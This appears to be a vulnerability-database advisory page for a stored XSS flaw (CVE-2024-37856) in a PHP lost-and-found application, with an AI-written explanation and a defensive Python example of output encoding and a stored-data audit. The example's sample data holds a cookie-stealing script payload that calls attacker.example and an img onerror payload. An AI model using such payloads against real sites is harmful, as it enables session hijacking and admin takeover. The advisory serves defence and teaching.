VYPR
Unrated severity · NVD Advisory · Published Jul 29, 2024 · Updated Oct 30, 2024

CVE-2024-37856

Description

Cross Site Scripting vulnerability in Lost and Found Information System 1.0 allows a remote attacker to escalate privileges via the first, last, middle name fields in the User Profile page.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Lost and Found Information System 1.0 has a stored XSS vulnerability in user profile fields, enabling privilege escalation via admin session hijacking.

Vulnerability

Lost and Found Information System 1.0 (published on SourceCodester) contains a stored Cross-Site Scripting (XSS) vulnerability in the User Profile page [1]. The first, last, and middle name fields are neither validated on input nor HTML-encoded on output, so an attacker can submit arbitrary HTML and JavaScript as a name. The payload is persisted in the database and rendered unencoded whenever an administrator views the affected profile. The attacker needs a registered account to store the payload; once stored, it executes in the administrator's browser without any further interaction from the attacker.

Exploitation

An attacker with a registered user account navigates to the User Profile page and submits a JavaScript payload (for example, a `<script>` element or an HTML tag carrying an event-handler attribute) in one or more of the first, last, or middle name fields. After the profile is saved, the payload is stored in the application's database. When an administrator opens the user management section and views that user's details, the page renders the stored name fields as raw HTML and the injected script executes in the administrator's browser context. The attacker requires only network access to the web application and a valid session for their own account.

Impact

Successful exploitation leads to arbitrary JavaScript execution within the administrator's session. This can be used to steal session cookies, perform actions on behalf of the admin (e.g., modifying system settings, creating new admin accounts), or exfiltrate sensitive data. The net result is privilege escalation from a standard user to full administrative control over the Lost and Found Information System [1].

Mitigation

As of the publication date (2024-07-29), no official patch has been released by the vendor (SourceCodester). The recommended fix is contextual output encoding: escape every stored value as HTML entities at the point where it is written into the page (e.g., `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` in PHP), rather than relying on filtering at input time, and deploy a Content Security Policy (CSP) header as defense in depth to limit what an injected script can do if encoding is missed. Until a fixed version is provided, administrators should review stored profile data for HTML markup, clean any affected rows, and restrict user registration to trusted parties [1].
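The following Python is an added example and is not code from the Lost and Found Information System (which is a PHP application) or from the cited reference. It models the vulnerable rendering pattern described under Exploitation beside the entity-encoding fix recommended under Mitigation, and adds the stored-data audit check an administrator would run while unpatched. The field names `firstname`, `middlename`, `lastname`, the sample profiles, and the payload strings are all constructed for the example; `html.escape(quote=True)` stands in for PHP's `htmlspecialchars` with `ENT_QUOTES`.

```python
import html
import re

# Constructed sample rows, standing in for what the profile-update handler stores.
# Profile 2 carries a constructed stored-XSS payload; profile 3 shows that a
# legitimate apostrophe must survive encoding while a tag in a name must not.
SAMPLE_PROFILES = [
    {"id": 1, "firstname": "Alice", "middlename": "", "lastname": "Smith"},
    {"id": 2, "firstname": "Bob",
     "middlename": "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
     "lastname": "Jones"},
    {"id": 3, "firstname": "O'Brien", "middlename": "",
     "lastname": "<img src=x onerror=alert(1)>"},
]

PROFILE_FIELDS = ("firstname", "middlename", "lastname")


def render_profile_unsafe(profile):
    """Vulnerable pattern: stored values are concatenated into HTML unchanged,
    so any markup stored in a name field becomes part of the admin's page."""
    return "<td>{firstname} {middlename} {lastname}</td>".format(**profile)


def render_profile_safe(profile):
    """Hardened form: every value is HTML-entity-encoded at output time.
    quote=True also encodes ' and ", which matters once a value lands inside an
    attribute; this is the equivalent of htmlspecialchars(..., ENT_QUOTES)."""
    cells = {f: html.escape(str(profile[f]), quote=True) for f in PROFILE_FIELDS}
    return "<td>{firstname} {middlename} {lastname}</td>".format(**cells)


# Heuristic for the interim audit of stored rows: a tag opener, an inline event
# handler attribute, or a javascript: URL has no business in a person's name.
SUSPICIOUS_RE = re.compile(r"<[a-zA-Z/!]|\bon\w+\s*=|javascript:", re.IGNORECASE)


def find_suspicious_profiles(profiles):
    """Return (id, field, value) for every name field that contains markup,
    so an administrator can clean those rows before viewing them."""
    hits = []
    for p in profiles:
        for field in PROFILE_FIELDS:
            value = str(p.get(field, ""))
            if SUSPICIOUS_RE.search(value):
                hits.append((p["id"], field, value))
    return hits


if __name__ == "__main__":
    for p in SAMPLE_PROFILES:
        print("unsafe:", render_profile_unsafe(p))
        print("safe:  ", render_profile_safe(p))
    print("audit hits:", find_suspicious_profiles(SAMPLE_PROFILES))
```

The audit regex is deliberately a coarse triage filter: it is there to find rows to inspect, not to serve as a sanitizer, and it should never replace output encoding in the view. Encoding belongs at the point of output because the same stored name may be rendered in several templates, and an input-side filter has to anticipate every one of them.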

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0 (no linked articles in our index yet)